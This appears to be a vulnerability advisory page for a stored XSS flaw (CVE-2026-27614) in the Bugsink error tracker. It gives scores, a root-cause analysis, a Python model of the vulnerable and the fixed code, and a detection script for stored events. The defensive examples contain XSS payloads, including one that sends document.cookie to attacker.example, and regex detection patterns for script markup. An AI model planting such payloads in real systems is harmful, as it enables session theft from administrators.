Cyber Resilience

CVE-2026-27614

Critical · Public PoC

Published: 25 February 2026
Modified: 27 February 2026
KEV Added: not listed
Patch: 2.0.13
CVSS Score (v3.1): 9.3 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
EPSS Score: 0.0029 (20.1st percentile)
Risk Priority: 70 (floored blend · peak EPSS)

Summary

CVE-2026-27614 is a critical-severity stored Cross-site Scripting (CWE-79) vulnerability in Bugsink (vendor Bugsink), a self-hosted error tracking tool. Its CVSS v3.1 base score is 9.3 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS places it at the 20.1st percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced. The low EPSS score does not offset the public PoC and the unauthenticated ingest path: any instance whose DSN ingest endpoint is reachable by untrusted parties should be treated as exposed until upgraded.

The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-27614 is a stored cross-site scripting (XSS) vulnerability (CWE-79) in Bugsink, a self-hosted error tracking tool, affecting versions prior to 2.0.13. The flaw is in the `_pygmentize_lines()` function in `theme/templatetags/issues.py` (lines 75-77): a known Pygments quirk, triggered in particular by Ruby heredoc-style input, makes the highlighter return more lines than it was given, and the function handles the mismatch by falling back to the raw, unescaped input lines. Those lines are then passed unconditionally to Django's `mark_safe()` (lines 111-113), so the template renders them without escaping. Because events reach Bugsink through the public DSN ingest endpoint, an attacker can place arbitrary JavaScript in the source-context lines of an event and have it stored for later rendering.

An unauthenticated attacker who can submit events to a Bugsink project—by knowing the DSN or accessing a client that uses it, and with the ingest endpoint reachable—can inject the JavaScript payload into the database. The payload executes only if an administrator explicitly views the affected Stacktrace in the web UI. Successful exploitation enables the attacker to run JavaScript in the administrator's browser, acting with that user's privileges within Bugsink. The CVSS v3.1 base score is 9.3 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N).

Bugsink version 2.0.13 addresses the vulnerability. Mitigation details are provided in the GitHub security advisory (GHSA-vp6q-7m36-pq3w), the release notes for version 2.0.13, and the fixing commit (e784d6aeb0d5f29b40c2779d2544c2b9ef097ee9).

Vulnerability details

Bugsink is a self-hosted error tracking tool. In versions prior to 2.0.13, an unauthenticated attacker who can submit events to a Bugsink project can store arbitrary JavaScript in an event. The payload executes only if a user explicitly views the affected Stacktrace in the web UI. When Pygments returns more lines than it was given (a known upstream quirk that triggers with Ruby heredoc-style input), `_pygmentize_lines()` in `theme/templatetags/issues.py:75-77` falls back to returning the raw input lines. `mark_safe()` at lines 111-113 is then applied unconditionally, including to those unsanitized raw lines. Since DSN endpoints are public by Sentry protocol, no account is needed to inject. The payload sits in the database until an admin looks at the event. Successful exploitation requires that the attacker be able to submit events to the project (i.e. knows the DSN or can access a client that uses it), that the Bugsink ingest endpoint be reachable to the attacker, and that an administrator explicitly view the crafted event in the UI. Under those conditions, the attacker can execute JavaScript in the administrator's browser and act with that user's privileges within Bugsink. Version 2.0.13 fixes the vulnerability.
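To make the defect pattern described in the deeper analysis and in the details above concrete, here is an added, self-contained Python model of it. It is not Bugsink's code and does not import Pygments: `highlight_lines()` is a constructed stand-in whose quirk branch imitates the upstream line-count mismatch on Ruby heredoc openers, `SafeString`/`mark_safe()` stand in for Django's, and `pygmentize_lines_vulnerable()` beside `pygmentize_lines_fixed()` shows the unconditional `mark_safe()` against a fallback that escapes before marking safe. All of those names and the sample frames are this example's assumptions.

```python
"""Model of the CVE-2026-27614 defect pattern: highlight, fall back, mark safe.

Added example, not Bugsink's code. highlight_lines() is a constructed stand-in
for Pygments whose quirk branch imitates the upstream line-count mismatch;
SafeString/mark_safe stand in for Django's. The frames at the bottom are
constructed sample input.
"""
import html
from typing import List


class SafeString(str):
    """Stand-in for django.utils.safestring.SafeString: text the template
    engine emits verbatim, with no further escaping."""


def mark_safe(s: str) -> SafeString:
    return SafeString(s)


def highlight_lines(lines: List[str]) -> List[str]:
    """Constructed highlighter stand-in.

    Normal path: one escaped, span-wrapped output line per input line.
    Quirk path: a Ruby heredoc opener (<<~ID or <<-ID) makes it return one
    extra line, so len(output) != len(input), imitating the Pygments
    behaviour the advisory describes.
    """
    out = ['<span class="code">%s</span>' % html.escape(line) for line in lines]
    if any("<<~" in line or "<<-" in line for line in lines):
        out.append('<span class="code"></span>')  # surplus line from the quirk
    return out


def pygmentize_lines_vulnerable(lines: List[str]) -> List[SafeString]:
    """Pre-fix pattern: on a line-count mismatch fall back to the raw input,
    then mark every line safe regardless of which path produced it."""
    highlighted = highlight_lines(lines)
    if len(highlighted) != len(lines):
        highlighted = lines                                # raw, unescaped fallback
    return [mark_safe(line) for line in highlighted]       # bypasses autoescaping


def pygmentize_lines_fixed(lines: List[str]) -> List[SafeString]:
    """Hardened pattern: the fallback path escapes before anything is marked
    safe, so the output is inert on both paths."""
    highlighted = highlight_lines(lines)
    if len(highlighted) != len(lines):
        highlighted = [html.escape(line) for line in lines]
    return [mark_safe(line) for line in highlighted]


def contains_live_script(rendered: List[str]) -> bool:
    """Would a browser see an unescaped <script> tag in these rendered lines?"""
    return any("<script" in line for line in rendered)


# Constructed attacker-controlled source context, as it could arrive in the
# stacktrace of an event submitted to the DSN endpoint: a heredoc opener to
# trigger the quirk and a script payload on the following line.
ATTACKER_FRAME = [
    "sql = <<~EOS",
    "<script>alert(document.cookie)</script>",
    "EOS",
]
# Same payload without a heredoc opener: the normal path escapes it.
NO_QUIRK_FRAME = [
    "sql = 'SELECT 1'",
    "<script>alert(document.cookie)</script>",
]

if __name__ == "__main__":
    print("vulnerable, quirk   :", contains_live_script(pygmentize_lines_vulnerable(ATTACKER_FRAME)))
    print("vulnerable, no quirk:", contains_live_script(pygmentize_lines_vulnerable(NO_QUIRK_FRAME)))
    print("fixed, quirk        :", contains_live_script(pygmentize_lines_fixed(ATTACKER_FRAME)))
```

The point is the ordering: whatever the highlighter's line-count quirk does, nothing may be marked safe unless it has passed through an escaping step, so a fallback must escape rather than hand back raw input.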

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

MITRE ATT&CK Enterprise Techniques [AI]

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.007 JavaScript (Execution)
Adversaries may abuse various implementations of JavaScript for execution.
Why these techniques?

Stored XSS via the unauthenticated public DSN ingest endpoint (T1190) stores an arbitrary JavaScript payload that later executes in the browser (T1059.007) when an admin views the stacktrace, yielding a high-impact compromise of the admin's session.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
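The mapping above describes an unauthenticated ingest (T1190) whose payload waits in stored events until rendered (T1059.007), and the stored events are still there after an upgrade. A defender may therefore want to hunt for ingestion attempts. The following added Python helper is not Bugsink code: it assumes events are held in Sentry event format (stacktrace frames with `pre_context`, `context_line` and `post_context`), flags frames that combine a Ruby heredoc opener (the quirk trigger) with HTML or script markup, and runs over a constructed sample event. The regexes, field access and sample are this example's assumptions; tune them to the real stored schema and expect to review hits by hand.

```python
"""Hunt stored events for CVE-2026-27614 exploitation attempts.

Added example, not Bugsink code. Assumes Sentry event format: stacktrace frames
carry pre_context / context_line / post_context lists of source lines. The
SAMPLE_EVENT below is constructed test data.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Ruby heredoc openers, the input shape the advisory names as the trigger for
# the Pygments line-count quirk: <<~EOS, <<-EOS, <<EOS, <<~'EOS', <<-"EOS".
HEREDOC_RE = re.compile(r"<<[~-]?['\"]?[A-Za-z_]\w*['\"]?")

# Text that becomes live markup if a template emits it without escaping.
MARKUP_RE = re.compile(
    r"<\s*(script|img|svg|iframe|object|embed|body)\b"   # element that can run code
    r"|\bon(load|error|click|mouseover|focus)\s*="        # inline event handler
    r"|javascript:",                                      # javascript: URL
    re.IGNORECASE,
)


def frame_source_lines(frame: Dict) -> List[str]:
    """Collect every source line a UI would highlight for this frame."""
    lines = list(frame.get("pre_context") or [])
    if frame.get("context_line") is not None:
        lines.append(frame["context_line"])
    lines.extend(frame.get("post_context") or [])
    return [line for line in lines if isinstance(line, str)]


def iter_frames(event: Dict) -> Iterable[Tuple[str, Dict]]:
    """Yield (json_path, frame) for frames in exception/thread stacktraces and
    in a top-level stacktrace, the places Sentry-format events carry them."""
    for container in ("exception", "threads"):
        values = (event.get(container) or {}).get("values") or []
        for i, value in enumerate(values):
            frames = (value.get("stacktrace") or {}).get("frames") or []
            for j, frame in enumerate(frames):
                yield f"{container}.values[{i}].stacktrace.frames[{j}]", frame
    for j, frame in enumerate((event.get("stacktrace") or {}).get("frames") or []):
        yield f"stacktrace.frames[{j}]", frame


def suspicious_frames(event: Dict) -> List[Dict]:
    """Return frames whose source context pairs a heredoc opener (quirk trigger)
    with markup that would execute if rendered unescaped."""
    hits = []
    for path, frame in iter_frames(event):
        src = frame_source_lines(frame)
        if not any(HEREDOC_RE.search(line) for line in src):
            continue
        markup = [line for line in src if MARKUP_RE.search(line)]
        if markup:
            hits.append({"path": path, "filename": frame.get("filename"), "markup_lines": markup})
    return hits


# Constructed sample: one ordinary frame that must not be flagged, and one
# frame carrying a heredoc opener plus a script payload in its context line.
SAMPLE_EVENT = {
    "event_id": "0" * 32,
    "platform": "ruby",
    "exception": {"values": [{
        "type": "RuntimeError",
        "value": "boom",
        "stacktrace": {"frames": [
            {"filename": "app/jobs/mailer.rb", "lineno": 7,
             "pre_context": ["def deliver", "  if size < body_limit"],
             "context_line": "    raise RuntimeError, 'boom'",
             "post_context": ["  end"]},
            {"filename": "app/models/report.rb", "lineno": 42,
             "pre_context": ["def render_sql", "  sql = <<~EOS"],
             "context_line": "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
             "post_context": ["  EOS", "end"]},
        ]},
    }]},
}

if __name__ == "__main__":
    for hit in suspicious_frames(SAMPLE_EVENT):
        print(hit["path"], hit["filename"], hit["markup_lines"])
```

Requiring both the heredoc opener and markup in the same frame keeps the noise down: Ruby code with a heredoc is common, and so are angle brackets in source, but the two together in one frame's context is the precise shape this bug needs.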

CVEs Like This One

CVE-2026-40162 (same product: Bugsink)
CVE-2025-26907 (shared CWE-79)
CVE-2025-69084 (shared CWE-79)
CVE-2025-69048 (shared CWE-79)
CVE-2025-22567 (shared CWE-79)
CVE-2025-69324 (shared CWE-79)
CVE-2026-1841 (shared CWE-79)
CVE-2025-26588 (shared CWE-79)
CVE-2025-23850 (shared CWE-79)
CVE-2025-23643 (shared CWE-79)

Affected Assets

bugsink / bugsink: versions < 2.0.13 (fixed in 2.0.13)

Mitigating Controls (NIST 800-53 r5) [AI]

SI-2 Flaw Remediation (prevent): mandates timely flaw remediation; upgrading to Bugsink 2.0.13 removes the combination of the Pygments quirk and the unconditional `mark_safe()` that enables the stored XSS.

SI-15 Information Output Filtering (prevent): escaping stacktrace output in the web UI prevents injected JavaScript from executing when administrators view affected events. For this bug class, output escaping rather than input filtering is the decisive control.

SI-10 Information Input Validation (prevent): validating event payloads submitted via the public DSN endpoint can reduce the chance of storing malicious JavaScript, but it is a weak control here, since the payload arrives as ordinary source-context text and cannot be reliably told apart from legitimate code.